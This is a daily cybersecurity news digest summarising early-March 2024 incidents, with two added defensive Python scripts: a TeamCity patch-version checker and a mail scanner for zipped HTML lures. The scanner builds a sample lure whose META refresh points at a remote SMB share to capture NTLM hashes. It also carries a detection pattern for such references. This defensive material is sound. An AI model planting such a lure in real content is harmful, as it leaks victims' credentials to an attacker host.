Daily Brief


Total articles found: 11787


2024-03-05 01:34:33 theregister DDOS Cloudflare Introduces AI-Specific Firewall to Combat DDoS and Data Leaks
Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs). The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications. Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed. Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks. This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare. Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures.
2024-03-04 23:07:03 theregister DATA BREACH American Express Customer Data Leaked Through Vendor Error
A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates. The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems. American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information. The state of Massachusetts publicized the incident, noting that American Express has filed 16 breach notifications with the state so far this year. Past breaches reported there involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement. American Express assures customers that they will not be held liable for fraudulent charges and advises them to monitor their accounts and enable alerts for suspicious activity.
2024-03-04 22:46:15 bleepingcomputer MALWARE Critical TeamCity Vulnerability Risk: Immediate Patching Recommended
A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains' TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication. Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply the security patch plugin, as full exploit details are public. The JetBrains update also resolves a secondary vulnerability (CVE-2024-27199), which permitted alteration of certain system settings by unauthenticated users. Both vulnerabilities affect the web component of all earlier on-premises TeamCity versions and, because a CI server holds build credentials and signing material, expose organizations to supply chain attacks. Cybersecurity firm Rapid7 demonstrated exploitability with a proof-of-concept exploit that obtains a shell on a TeamCity server. The less severe vulnerability could be used for denial of service or to intercept client connections if the attacker is already on the network. While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are expected to exploit these weaknesses imminently.
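A first triage step for this advisory is an inventory sweep of every TeamCity server's reported version against the fixed release. The script below is an added example written for this brief, not JetBrains' or Rapid7's code. It assumes the server's REST endpoint /app/rest/server answers with a JSON document carrying a "version" string such as "2023.11.3 (build 147512)" (the path, the Accept header and the key name are assumptions; guest access or credentials may be required), and the sample inventory at the bottom is constructed.

```python
"""Added example, not JetBrains' or Rapid7's code: flag TeamCity On-Premises
servers whose reported version predates 2023.11.4, the release the advisory
names as containing the fix for CVE-2024-27198 and CVE-2024-27199."""
import json
import re
import urllib.request

FIXED_VERSION = (2023, 11, 4)   # first release containing the fix


def parse_version(banner: str) -> tuple[int, int, int]:
    """'2023.11.3 (build 147512)' -> (2023, 11, 3); '2023.11' -> (2023, 11, 0)."""
    m = re.match(r"\s*(\d{4})\.(\d+)(?:\.(\d+))?", banner)
    if not m:
        raise ValueError(f"unrecognised TeamCity version string: {banner!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable_version(banner: str) -> bool:
    """True when the reported build predates the fixed release."""
    return parse_version(banner) < FIXED_VERSION


def fetch_version(base_url: str, timeout: float = 5.0) -> str:
    """Ask the REST API for the server version.
    Assumption: /app/rest/server is reachable and returns JSON with a
    'version' key; use /guestAuth/app/rest/server or add an Authorization
    header if your instance requires it."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/app/rest/server",
        headers={"Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)["version"]


def triage(servers: dict[str, str]) -> dict[str, str]:
    """servers: {name: version banner} -> {name: verdict}."""
    verdicts = {}
    for name, banner in servers.items():
        try:
            vulnerable = is_vulnerable_version(banner)
        except ValueError as exc:
            verdicts[name] = f"unknown ({exc})"
            continue
        verdicts[name] = "PATCH NOW" if vulnerable else "fixed release"
    return verdicts


if __name__ == "__main__":
    # Constructed sample inventory; in practice fill it from fetch_version(url).
    sample = {
        "ci-prod": "2023.11.3 (build 147512)",
        "ci-legacy": "2022.10.1 (build 116936)",
        "ci-new": "2023.11.4 (build 147618)",
    }
    for host, verdict in triage(sample).items():
        print(f"{host:10s} {verdict}")
```

One caveat a version sweep cannot resolve: a server fixed through the security patch plugin rather than an upgrade keeps its old version string, so any "PATCH NOW" hit needs a second look at the installed plugins before it is escalated. Treat a server that is reachable without credentials at all as its own finding.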
2024-03-04 22:15:32 bleepingcomputer NATION STATE ACTIVITY Kimsuky APT Exploits ScreenConnect Flaws to Deploy ToddleShark Malware
North Korean state-sponsored hacking group Kimsuky is exploiting flaws in ScreenConnect to deploy ToddleShark malware for espionage. ConnectWise earlier urged ScreenConnect users to update their servers to patch vulnerabilities CVE-2024-1708 and CVE-2024-1709. ToddleShark uses polymorphism and legitimate Microsoft binaries to evade detection and achieve persistence for continuous data theft. The malware modifies registry settings, schedules tasks, and gathers system information to send to the attackers' C2 infrastructure. Kroll's cybersecurity intelligence report describes ToddleShark's evasion techniques and ties it to the previously known Kimsuky backdoors BabyShark and ReconShark. Kroll is set to release specific details and indicators of compromise for ToddleShark in an upcoming blog post.
2024-03-04 21:49:52 bleepingcomputer CYBERCRIME TA577 Group Phishing Campaign Targets Windows NTLM Hashes
Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes (strictly, the NTLMv2 challenge-response produced during SMB authentication, which can be cracked offline or relayed rather than replayed as-is), enabling account hijacking. Two recent waves of attacks, on February 26 and 27, 2024, targeted employees' hashes at hundreds of organizations worldwide. Captured NTLM hashes can facilitate unauthorized access to accounts and sensitive data and lateral movement within networks. The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server to capture the hashes. Proofpoint's report indicates that, despite the absence of a malware payload, the primary objective of these phishing efforts is to gather NTLM hashes. Proofpoint notes that accounts without multi-factor authentication are more exposed to follow-on abuse of the stolen hashes, which may also be used for reconnaissance to identify high-value targets. Recommended defensive measures include blocking outbound SMB connections, filtering emails with zipped HTML files, and configuring Windows group policy to restrict outgoing NTLM traffic.
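The mail-filtering measure named above, catching zipped HTML attachments before a user opens one, can be made more precise than a blanket block on the file type by looking inside the archive for the thing that actually triggers the SMB connection: a file:// URL or UNC path naming a remote host. The block below is an added example written for this brief, not Proofpoint's code and not TA577's lure; the function names are assumptions, and the sample message, including its META refresh to a documentation-range IP, is constructed to show the mechanism rather than copied from the campaign.

```python
"""Added example, not Proofpoint's or TA577's code: mail-gateway check for a
ZIP attachment holding an HTML file that points the victim's machine at a
remote SMB share.  Names are assumptions; the sample message is constructed."""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# file:// URLs and UNC paths naming a remote host make Windows open an SMB
# session (and authenticate with NTLM) when a browser or Explorer resolves them.
_REMOTE_SMB_RE = re.compile(
    r"(?:file:///*|\\\\)(?:(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9.-]+\.[a-z]{2,})[\\/]",
    re.IGNORECASE,
)


def html_members(zip_bytes: bytes) -> dict[str, str]:
    """Return {member name: text} for .htm/.html entries in a ZIP blob."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith((".htm", ".html")):
                out[info.filename] = zf.read(info).decode("utf-8", "replace")
    return out


def smb_targets(html: str) -> list[str]:
    """Remote hosts referenced through file:// or UNC inside the HTML."""
    return sorted({m.group(0) for m in _REMOTE_SMB_RE.finditer(html)})


def scan_message(raw: bytes) -> list[dict]:
    """Findings for one RFC 5322 message: one dict per HTML file inside a ZIP."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        # Match on the ZIP magic as well as the name, since names are cheap to spoof.
        if not (name.lower().endswith(".zip") or payload[:2] == b"PK"):
            continue
        try:
            pages = html_members(payload)
        except zipfile.BadZipFile:
            continue
        for member, html in pages.items():
            targets = smb_targets(html)
            findings.append({"zip": name, "html": member,
                             "smb_targets": targets,
                             "verdict": "block" if targets else "review"})
    return findings


def build_sample() -> bytes:
    """Constructed lure: zipped HTML whose META refresh goes to a remote share."""
    html = ('<meta http-equiv="refresh" content="0;url=file://203.0.113.5/share/x">'
            '<p>Document is loading...</p>')   # 203.0.113.0/24 is a documentation range
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.html", html)
    msg = EmailMessage()
    msg["From"] = "billing@example.net"
    msg["To"] = "staff@example.com"
    msg["Subject"] = "RE: outstanding invoice"
    msg.set_content("See attached.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

The pattern only catches references written out in the markup; a lure that assembles the file:// URL in JavaScript needs rendering in a sandbox to be caught the same way, which is why the summary's other two controls, blocking outbound SMB at the edge and restricting outgoing NTLM by policy, stay in place regardless of what the mail filter finds.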
2024-03-04 21:03:55 theregister CYBERCRIME ALPHV Ransomware Group Suspected of $22M Bitcoin Ransom Theft
ALPHV/BlackCat, a ransomware gang, is linked to receiving a $22 million ransom payment in Bitcoin possibly connected to the Change Healthcare cyberattack. The payment was spotted by Recorded Future analyst Dmitry Smilyanets, who observed a 350 Bitcoin transaction to a wallet tied to ALPHV. Change Healthcare, an IT provider for over 70,000 US pharmacies and hospitals, suffered a major BlackCat ransomware attack that disrupted prescription processing. Questions to Change's parent company, UnitedHealth Group, about the ransom payment went unanswered, with the ongoing investigation cited. The attack disrupted services at multiple pharmacies, including CVS and Walgreens, with systems taken offline because of the incident. ALPHV reportedly kept the ransom money from the affiliate that carried out the intrusion, raising questions about trust within ransomware operations. The affiliate claims to retain 4TB of sensitive data from Change Healthcare and its partners and threatens to leak it if payment is not secured. The situation illustrates the lack of "honor among thieves" and serves as a warning about the reliability of cybercrime affiliate networks.
2024-03-04 20:02:45 theregister NATION STATE ACTIVITY North Korean Spies Accused of Stealing Chip Designs from South Korea
North Korean operatives allegedly infiltrated servers of South Korean chipmakers to steal product designs, to help develop the North's own semiconductor industry. Seoul's National Intelligence Service reported ongoing cyber-espionage against semiconductor equipment makers since last year. Attackers used "living off the land" tactics, employing legitimate administrative tools to evade detection while conducting their operations. The intrusions resulted in the theft of product design drawings and facility photos, with at least two known companies affected, in December and February. The South Korean spy agency is working closely with the victimized firms to strengthen defenses and has informed all national semiconductor entities of the threat. The announcement aligns with recent warnings about North Korean operators targeting global defense technologies and conducting elaborate social engineering operations. South Korea links these espionage efforts to the North's difficulty acquiring technology under international sanctions and to the increased demand for semiconductors in its weapons programs.
2024-03-04 17:49:47 theregister NATION STATE ACTIVITY German Defense Communications Tapped, Leaked by Russian Entities
A recording of a sensitive German defense call discussing Ukraine was intercepted and leaked by Russian media. The leak was confirmed by the German Ministry of Defense and involved conversations on the Cisco WebEx platform. High-level officials speculate the leak could have resulted from a Russian agent in the call or a flaw in the implementation of WebEx. The audio disclosure has led to allegations by Russia of Germany's intent to secretly aid Ukraine with Taurus missile deliveries. German officials fear Russia may have more intercepted recordings and that this leak is a strategic effort to influence Germany's military aid to Ukraine. Russian officials have made provocative statements, accusing Germany of becoming an enemy and preparing for war, escalating tensions further. The German government is treating the incident as a serious security breach and as an act of "information war" aimed at disinformation and division. The Bundeswehr is investigating the incident, while the defense minister has publicly denounced the leak as a hybrid disinformation attack.
2024-03-04 17:49:46 bleepingcomputer CYBERCRIME BlackCat Ransomware Allegedly Defrauds Affiliate of $22 Million
BlackCat ransomware group has abruptly shut down its servers, stirring speculation about its motives. Allegations have been made that BlackCat scammed its own affiliate out of a $22 million ransom received from Optum after an attack on Change Healthcare. Despite the shutdown of their leak blog and negotiation sites, the group's final message remains cryptic, stating only "Everything is off, we decide." The aggrieved affiliate claims to still possess 4TB of sensitive Optum data, threatening broader impacts on healthcare and insurance companies. Optum's parent company, UnitedHealth Group, has chosen not to comment on the ransom payment allegations, focusing instead on its ongoing investigation. BlackCat, which has rebranded multiple times, from DarkSide to BlackMatter to its current name, had previously been hit by law enforcement, and there are now hints that either an exit scam or another rebranding is underway.
2024-03-04 17:44:25 bleepingcomputer DATA BREACH American Express Notifies Cardholders of Third-Party Processor Breach
American Express has issued warnings to customers about a data breach involving one of their merchant processors, leading to the exposure of card information. The breach resulted in the unauthorized access of American Express Card members' data, including account numbers, names, and expiration dates, but not through a compromise of American Express' systems. The specifics regarding the number of affected customers, the identity of the compromised merchant processor, and the timing of the breach remain undisclosed. American Express has commenced an investigation, alerted regulatory authorities, and is in the process of notifying impacted customers in compliance with legal requirements. Customers are advised to monitor their statements for the next 12 to 24 months and report any suspicious transactions, enabling instant notifications through the American Express app for enhanced security. American Express reassures clients that they will not be held liable for any fraudulent charges made with their cards and suggests requesting a new card if their information was compromised.
2024-03-04 15:41:56 bleepingcomputer NATION STATE ACTIVITY Ukraine Allegedly Penetrates Russian Defense Ministry Servers
The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense has announced a breach of the Russian Ministry of Defense (Minoborony) servers. Classified documents purportedly obtained in the cyber operation include sensitive national security details. The "special operation" is said to have been significantly aided by a key minister, referred to as "Vadimovich", though the announcement gives little context about that person's role or identity. Ukrainian officials released screenshots allegedly taken from the hacked databases as proof of the successful attack. The legitimacy of the screenshots has not been independently verified, and the Russian Ministry of Defense has not yet released a statement. The GUR has previously claimed responsibility for cyberattacks on other Russian entities but did not indicate any destructive actions, such as data deletion, in this incident.
2024-03-04 14:50:37 bleepingcomputer NATION STATE ACTIVITY North Korea Suspected in South Korean Semiconductor Data Heist
North Korea reportedly targeted South Korean semiconductor firms to steal sensitive engineering data. South Korea's National Intelligence Service (NIS) identified increased cyber espionage activities against chipmakers in the latter half of 2023. Attackers exploited known vulnerabilities in internet-facing servers to gain initial access and used "living off the land" tactics to steal data and remain undetected. Incidents in December 2023 and February 2024 led to the theft of product designs and facility information. While the companies targeted have not been named, Samsung Electronics and SK Hynix are major players in the sector, with substantial contributions to the global semiconductor market. These cyberattacks are believed to be part of North Korea's efforts to enhance its military and technological capabilities. South Korea's NIS has alerted the affected firms and provided recommendations for detecting and mitigating these threats, emphasizing the importance of security updates and strict access controls.
2024-03-04 14:35:07 theregister CYBERCRIME Calls for Ransomware Payment Ban Intensify Amid Rising Cyber Threats
Ransomware continues to be a significant threat to businesses, with a recent push for a ban on ransomware payments by global law enforcement and cyber security experts. The LockBit ransomware crew has shown resilience, restoring its online presence shortly after government-led take-down attempts. Former UK National Cyber Security Centre CEO Ciaran Martin advocates a ban on ransom payments to disrupt cybercrime in the long term, while acknowledging the associated challenges. Critics of a ban suggest that prohibition could leave businesses with no other route to recovery, potentially leading to severe consequences, including company closures. Proponents argue that similar measures in the past, such as Italy's against kidnapping ransoms, had significant positive effects. Financial support packages for victims may be necessary, akin to government intervention during the Northern Ireland Troubles. A ban on ransom payments is not currently planned by the governments of the Five Eyes nations, but nearly 50 members of the Counter Ransomware Initiative pledged not to pay ransoms. The debate continues as the average extortion payment reached $1.5 million last year, indicating a rising trend in cyber extortion.
2024-03-04 13:54:08 thehackernews CYBERCRIME Dissecting the XHelper-Based Money Laundering Scheme via India's UPI
Cybercriminals exploited India's Unified Payments Interface (UPI) for money laundering, recruiting "money mules" through Telegram. The scheme used an Android application named XHelper to manage mules and facilitate transactions, circumventing India's Prevention of Money Laundering Act (PMLA). Funds obtained from illegal activities were transferred to accounts in China, with mules moving the money under false pretenses. XHelper let mules track earnings and complete transactions, and provided an incentive system of financial rewards. The application featured a referral system with a pyramid-like structure to expand the network of agents and mules. Mules received training on evading bank security measures and on making large transactions through fake corporate accounts. The broader issue is a growing ecosystem of mobile apps designed to streamline money laundering operations. Global law enforcement efforts, including by Europol, resulted in the arrest of over a thousand individuals connected to money mule operations.
2024-03-04 13:38:41 bleepingcomputer DATA BREACH American Express Alerts Customers to Third-Party Data Breach
American Express has issued a warning to customers regarding the exposure of credit card details through a third-party service provider hack. This data breach affected American Express Travel Related Services Company, a division dealing with travel services. Personal customer information such as card account numbers, names, and expiration dates were accessed by unauthorized parties. Specific details about the service provider compromised, the extent of the data breach, and the timing of the incident remain undisclosed. American Express has notified regulatory authorities, is investigating the breach, and is reaching out to impacted customers to inform them of the situation and the necessary precautions. Customers are advised to review their account statements for the next one to two years, report any suspicious activities, and consider changing their card numbers. The company assures customers that they will not be held liable for any fraudulent charges and recommends setting up instant notifications for transaction alerts.